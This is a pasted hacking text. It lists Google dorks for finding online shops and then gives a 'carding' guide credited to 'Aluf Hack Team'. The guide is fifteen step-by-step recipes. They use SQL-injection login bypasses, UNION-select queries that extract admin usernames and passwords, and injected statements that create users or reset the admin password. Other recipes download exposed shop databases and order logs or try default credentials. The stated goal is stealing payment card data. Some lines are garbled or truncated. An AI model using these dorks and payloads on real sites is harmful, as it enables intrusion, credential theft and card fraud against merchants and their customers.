Google Dorks List

  1. Google Dorks List
  2.  
  3.  
  4. inurl:".php?cat="+intext:"Paypal"+site:UK
  5. inurl:".php?cat="+intext:"/Buy Now/"+site:.net
  6. inurl:".php?cid="+intext:"online+betting"
  7.  
  8.  
  9.  
  10. inurl:".php?id=" intext:"View cart"
  11. inurl:".php?id=" intext:"Buy Now"
  12. inurl:".php?id=" intext:"add to cart"
  13. inurl:".php?id=" intext:"shopping"
  14. inurl:".php?id=" intext:"boutique"
  15. inurl:".php?id=" intext:"/store/"
  16. inurl:".php?id=" intext:"/shop/"
  17. inurl:".php?id=" intext:"toys"
  18.  
  19. inurl:".php?cid="
  20. inurl:".php?cid=" intext:"shopping"
  21. inurl:".php?cid=" intext:"add to cart"
  22. inurl:".php?cid=" intext:"Buy Now"
  23. inurl:".php?cid=" intext:"View cart"
  24. inurl:".php?cid=" intext:"boutique"
  25. inurl:".php?cid=" intext:"/store/"
  26. inurl:".php?cid=" intext:"/shop/"
  27. inurl:".php?cid=" intext:"Toys"
  28.  
  29. inurl:".php?cat="
  30. inurl:".php?cat=" intext:"shopping"
  31. inurl:".php?cat=" intext:"add to cart"
  32. inurl:".php?cat=" intext:"Buy Now"
  33. inurl:".php?cat=" intext:"View cart"
  34. inurl:".php?cat=" intext:"boutique"
  35. inurl:".php?cat=" intext:"/store/"
  36. inurl:".php?cat=" intext:"/shop/"
  37. inurl:".php?cat=" intext:"Toys"
  38.  
  39. inurl:".php?catid="
  40. inurl:".php?catid=" intext:"View cart"
  41. inurl:".php?catid=" intext:"Buy Now"
  42. inurl:".php?catid=" intext:"add to cart"
  43. inurl:".php?catid=" intext:"shopping"
  44. inurl:".php?catid=" intext:"boutique"
  45. inurl:".php?catid=" intext:"/store/"
  46. inurl:".php?catid=" intext:"/shop/"
  47. inurl:".php?catid=" intext:"Toys"
  48.  
  49. inurl:".php?categoryid="
  50. inurl:".php?categoryid=" intext:"View cart"
  51. inurl:".php?categoryid=" intext:"Buy Now"
  52. inurl:".php?categoryid=" intext:"add to cart"
  53. inurl:".php?categoryid=" intext:"shopping"
  54. inurl:".php?categoryid=" intext:"boutique"
  55. inurl:".php?categoryid=" intext:"/store/"
  56. inurl:".php?categoryid=" intext:"/shop/"
  57. inurl:".php?categoryid=" intext:"Toys"
  58.  
  59. inurl:".php?pid="
  60. inurl:".php?pid=" intext:"shopping"
  61. inurl:".php?pid=" intext:"add to cart"
  62. inurl:".php?pid=" intext:"Buy Now"
  63. inurl:".php?pid=" intext:"View cart"
  64. inurl:".php?pid=" intext:"boutique"
  65. inurl:".php?pid=" intext:"/store/"
  66. inurl:".php?pid=" intext:"/shop/"
  67. inurl:".php?pid=" intext:"toys"
  68.  
  69. inurl:".php?prodid=
  70. inurl:".php?prodid=" intext:"shopping"
  71. inurl:".php?prodid=" intext:"add to cart"
  72. inurl:".php?prodid=" intext:"Buy Now"
  73. inurl:".php?prodid=" intext:"View cart"
  74. inurl:".php?prodid=" intext:"boutique"
  75. inurl:".php?prodid=" intext:"/store/"
  76. inurl:".php?prodid=" intext:"/shop/"
  77. inurl:".php?prodid=" intext:"toys"
  78.  
  79. inurl:".php?productid='
  80. inurl:".php?productid=" intext:"shopping"
  81. inurl:".php?productid=" intext:"add to cart"
  82. inurl:".php?productid=" intext:"Buy Now"
  83. inurl:".php?productid=" intext:"View cart"
  84. inurl:".php?productid=" intext:"boutique"
  85. inurl:".php?productid=" intext:"/store/"
  86. inurl:".php?productid=" intext:"/shop/"
  87. inurl:".php?productid=" intext:"Toys"
  88.  
  89. inurl:".php?product="
  90. inurl:".php?product=" intext:"shopping"
  91. inurl:".php?product=" intext:"add to cart"
  92. inurl:".php?product=" intext:"Buy Now"
  93. inurl:".php?product=" intext:"View cart"
  94. inurl:".php?product=" intext:"boutique"
  95. inurl:".php?product=" intext:"/store/"
  96. inurl:".php?product=" intext:"/shop/"
  97. inurl:".php?product=" intext:"toys"
  98. inurl:".php?product=" intext:"DVD"
  99.  
  100. inurl:".php?products="
  101. inurl:".php?products=" intext:"shopping"
  102. inurl:".php?products=" intext:"add to cart"
  103. inurl:".php?products=" intext:"Buy Now"
  104. inurl:".php?products=" intext:"View cart"
  105. inurl:".php?products=" intext:"boutique"
  106. inurl:".php?products=" intext:"/store/"
  107. inurl:".php?products=" intext:"/shop/"
  108. inurl:".php?products=" intext:"toys"
  109. inurl:".php?products=" intext:"DVD"
  110.  
  111. inurl:".php?proid="
  112. inurl:".php?proid=" intext:"shopping"
  113. inurl:".php?proid=" intext:"add to cart"
  114. inurl:".php?proid=" intext:"Buy Now"
  115. inurl:".php?proid=" intext:"View cart"
  116. inurl:".php?proid=" intext:"boutique"
  117. inurl:".php?proid=" intext:"/store/"
  118. inurl:".php?proid=" intext:"/shop/"
  119. inurl:".php?proid=" intext:"toys"
  120.  
  121. inurl:".php?shopid="
  122. inurl:".php?shopid=" intext:"shopping"
  123. inurl:".php?shopid=" intext:"add to cart"
  124. inurl:".php?shopid=" intext:"Buy Now"
  125. inurl:".php?shopid=" intext:"View cart"
  126. inurl:".php?shopid=" intext:"boutique"
  127. inurl:".php?shopid=" intext:"/store/"
  128. inurl:".php?shopid=" intext:"/shop/"
  129. inurl:".php?shopid=" intext:"Toys"
  130.  
  131. inurl:".php?itemid="
  132. inurl:".php?itemid=" intext:"shopping"
  133. inurl:".php?itemid=" intext:"add to cart"
  134. inurl:".php?itemid=" intext:"Buy Now"
  135. inurl:".php?itemid=" intext:"View cart"
  136. inurl:".php?itemid=" intext:"boutique"
  137. inurl:".php?itemid=" intext:"/shop/"
  138. inurl:".php?itemid=" intext:"/store/"
  139. inurl:".php?itemid=" intext:"Toys"
  140.  
  141. inurl:".php?orderid="
  142. inurl:".php?orderid=" intext:"shopping"
  143. inurl:".php?orderid=" intext:"add to cart"
  144. inurl:".php?orderid=" intext:"Buy Now"
  145. inurl:".php?orderid=" intext:"View cart"
  146. inurl:".php?orderid=" intext:"boutique"
  147. inurl:".php?orderid=" intext:"/shop/"
  148. inurl:".php?orderid=" intext:"/store/"
  149. inurl:".php?orderid=" intext:"Toys"
  150.  
  151.  
  152. inurl:".php?catalogId="
  153. inurl:".php?catalogId=" intext:"shopping"
  154. inurl:".php?catalogId=" intext:"add to cart"
  155. inurl:".php?catalogId=" intext:"Buy Now"
  156. inurl:".php?catalogId=" intext:"View cart"
  157. inurl:".php?catalogId=" intext:"boutique"
  158. inurl:".php?catalogId=" intext:"/shop/"
  159. inurl:".php?catalogId=" intext:"/store/"
  160. inurl:".php?catalogId=" intext:"Toys"
  161.  
  162. inurl:".php?aid="
  163. inurl:".php?aid=" intext:"shopping"
  164. inurl:".php?aid=" intext:"add to cart"
  165. inurl:".php?aid=" intext:"Buy Now"
  166. inurl:".php?aid=" intext:"View cart"
  167. inurl:".php?aid=" intext:"boutique"
  168. inurl:".php?aid=" intext:"/shop/"
  169. inurl:".php?aid=" intext:"/store/"
  170. inurl:".php?aid=" intext:"toys"
  171.  
  172. inurl:".php?artid="
  173. inurl:".php?artid=" intext:"shopping"
  174. inurl:".php?artid=" intext:"add to cart"
  175. inurl:".php?artid=" intext:"Buy Now"
  176. inurl:".php?artid=" intext:"View cart"
  177. inurl:".php?artid=" intext:"boutique"
  178. inurl:".php?artid=" intext:"/shop/"
  179. inurl:".php?artid=" intext:"/store/"
  180. inurl:".php?artid=" intext:"toys"
  181.  
  182.  
  183. inurl:".php?articleid="
  184. inurl:".php?articleid=" intext:"shopping"
  185. inurl:".php?articleid=" intext:"add to cart"
  186. inurl:".php?articleid=" intext:"Buy Now"
  187. inurl:".php?articleid=" intext:"View cart"
  188. inurl:".php?articleid=" intext:"boutique"
  189. inurl:".php?articleid=" intext:"/shop/"
  190. inurl:".php?articleid=" intext:"/store/"
  191. inurl:".php?articleid=" intext:"toys"
  192.  
  193. ##############################################
  194. Dork list +How to Do Carding- 2015 - March 20#
  195. ##############################################
  196.  
  197. DORK CARDING 2015 AND HOW TO EXPLOIT
  198. ============Legion7sign============
  199.  
  200. user.php?id=
  201. user.bmlid=
  202. user.jsp?id=
  203. user.cfm?id=
  204. user.htlm?id=
  205. user.php?CategoryID=
  206. user.php?shopID=
  207. user.php?shippingID=
  208. user.php?infoID=
  209. user.php?custID=
  210. user.php?webID=
  211. user.php?cad=
  212.  
  213. How to exploit :
  214.  
  215. [-]Tool
  216. -gr3enox exploit scanner
  217.  
  218.  
  219. Example dork :
  220. paypal : user.php?id=
  221. CreditCard : user.php?pay=
  222.  
  223. Paypal :
  224. user.php?id= < you can edit this dork :
  225. customer.php?id=
  226.  
  227. if you want to exploit just change the customer < & id < only
  228. example : payment.php?aspx=
  229.           payment.php?jsp=
  230.  
  231. Credit Card :
  232. user.php?pay= < example dork cc you can change :
  233. customer.php?pay=
  234.  
  235. wanna try ?
  236.  
  237. just change customer < & pay <
  238.  
  239. example :
  240.  
  241. amex.php?CategoryID=
  242.  
  243. exploit sample :
  244. u.php?jsp=
  245. u.php?aspx=
  246. u.php?id=
  247. u.php?pay=
  248. u.php?cat=
  249. u.php?search=
  250. u.php?urlid=
  251. u.php?car=
  252.  
  253. *PS : " You can add site like this : u.php?car=+site:uk
  254.  
  255. =======IT'S AT YOUR OWN RISK=======
  256.  
  257.  
  258. ##############################
  259. Full Explanation For Carding##
  260. ##############################
  261.  
  262.  
  263. ###############
  264. Aluf Hack Team#
  265. ###############
  266.  
  267. 1:
  268. google dork :--> inurl:"/cart.php?m="
  269. target looks like :--> ...cart.php?m=view
  270. exploit: change cart.php?m=view to /admin
  271. target with exploit :-->
  272. Username : 'or"="
  273. Password : 'or"=
  274.  
  275. 2:
  276. google dork :--> allinurlroddetail.asp?prod=
  277. target looks like :--> xxxxx.org (big letters and numbers )
  278. exploit :--> change the proddtail.asp?prod=SG369 with fpdb/vsproducts.mdb
  279. target with exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
  280.  
  281. 3:
  282. google dork :--> allinurl: /cgi-local/shopper.cgi
  283. target looks like :--> ....dd=action&key=
  284. exploit :--> ...&template=order.log
  285. target with exploit :--> .....late=order.log
  286.  
  287. 4:
  288. google dork :--> allinurl: Lobby.asp
  289. target looks like :--> www.xxxxx.com/mall/lobby.asp
  290. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
  291. target with exploit :--> www.xxxxx.com/fpdb/shop.mdb
  292.  
  293. 5:
  294. google dork :--> allinurl:/vpasp/shopsearch.asp
  295. when u find a target put this in search box
  296. Keyword=&category=5); insert into tbluser (fldusername) values
  297. ('')--&SubCategory=&hide=&action.x=46&action.y=6
  298. Keyword=&category=5); update tbluser set fldpassword='' where
  299. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  300. Keyword=&category=3); update tbluser set fldaccess='1' where
  301. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  302. Don't forget to replace and with values of your choice.
  303. To change the admin password, enter the following keyword:
  304. Keyword=&category=5); update tbluser set fldpassword='' where
  305. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
  306.  
  307. login page:
  308.  
  309. 6:
  310. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
  311. target looks like :--> ....asp?cat=xxxxxx
  312. exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
  313. if this is not working try this ends
  314. %20'a%25'--
  315. %20'b%25'--
  316. %20'c%25'--
  317. after finding user and pass go to login page:
  318.  
  319. 7:
  320. google dork :--> allinurl:/shopadmin.asp
  321. target looks like :--> www.xxxxxx.com/shopadmin.asp
  322. exploit:
  323. user : 'or'1
  324. pass : 'or'1
  325.  
  326. 8:
  327. google.com :--> allinurl:/store/index.cgi/page=
  328. target looks like :--> ....shortblue.htm
  329. exploit :--> ../admin/files/order.log
  330. target with exploit :--> .c....iles/order.log
  331.  
  332. 9:
  333. google.com:--> allinurl:/metacart/
  334. target looks like :--> www.xxxxxx.com/metacart/about.asp
  335. exploit :--> /database/metacart.mdb
  336. target with exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
  337.  
  338. 10:
  339. google.com:--> allinurl:/DCShop/
  340. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
  341. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
  342. target with exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
  343.  
  344. 11:
  345. google.com:--> allinurl:/shop/category.asp/catid=
  346. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
  347. exploit :--> /admin/dbsetup.asp
  348. target with exploit :--> www.xxxxxx.com/admin/dbsetup.asp
  349. after getting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  350. target for dl the database :--> www.xxxxxx.com/data/pdshoppro.mdb (doesn't need to be like this)
  351. in db look for access to find pass and user of shop admins.
  352.  
  353. 12:
  354. google.com:--> allinurl:/commercesql/
  355. target looks like :--> www.xxxxx.com/commercesql/xxxxx
  356. exploit :--> cgi-bin/commercesql/index.cgi?page=
  357. target with exploit admin config :--> ..../adminconf.pl
  358. target with exploit admin manager :--> ....in/manager.cgi
  359. target with exploit order.log :--> ....iles/order.log
  360.  
  361. 13:
  362. google.com:--> allinurl:/eshop/
  363. target looks like :--> www.xxxxx.com/xxxxx/eshop
  364. exploit :-->/cg-bin/eshop/database/order.mdb
  365. target with exploit :--> ....base/order.mdb
  366. after dl the db look at access for user and password
  367.  
  368. 14:
  369. 1/ search google: allinurl:"shopdisplayproducts.asp?id=
  370. --->=5
  371.  
  372. 2/ find error by adding '
  373. --->=5'
  374.  
  375. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
  376.  
  377. -If you don't see error then change id to cat
  378.  
  379. --->=5'
  380.  
  381. 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
  382.  
  383. --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
  384.  
  385. --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of column in the two selected tables or queries of a union queries do not match......
  386.  
  387. 4/ add 2,3,4,5,6.......until you see a nice table
  388.  
  389. add 2
  390. ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
  391. then 3
  392. ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
  393. then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
  394.  
  395. ...5,6,7,8,9.... until you see a table. (exp:...47)
  396.  
  397. ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
  398. ---->see a table.
  399.  
  400. 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
  401.  
  402. --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
  403.  
  404. 6/ Find link admin to login:
  405. try this first:
  406. or:
  407.  
  408. Didn't work? then u have to find yourself:
  409.  
  410. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  411.  
  412. --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  413.  
  414. you'll see something like: ( lot of them)
  415.  
  416. shopaddmoretocart.asp
  417. shopcheckout.asp
  418. shopdisplaycategories.asp
  419. ..............
  420.  
  421. then guess admin link by adding the above data until you find admin links
  422.  
  423. 15:
  424. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
  425. the most important thing here is xDatabase
  426. xDatabase: shopping140
  427. ok now the URL will be like this:
  428. ****://.victim.com/shop/shopping140.mdb
  429. if you didn't download the Database..
  430. Try this while there is dblocation.
  431. xDblocation
  432. resx
  433.  
  434. the url will be:
  435. ****://.victim.com/shop/resx/shopping140.mdb
  436. If u see the error message you have to try this :
  437. ****://.victim.com/shop/shopping500.mdb
  438.  
  439. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
  440.  
  441. inside you should be able to find *** information.
  442. and you should even be able to find the admin username and password for the website.
  443.  
  444. the admin login page is usually located here
  445. ****://.victim.com/shop/shopadmin.asp
  446.  
  447. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
  448.  
  449. Username: admin
  450. password: admin
  451. OR
  452. Username: vpasp
  453. password: vpasp
  454.  
  455. Hope you enjoy this !!
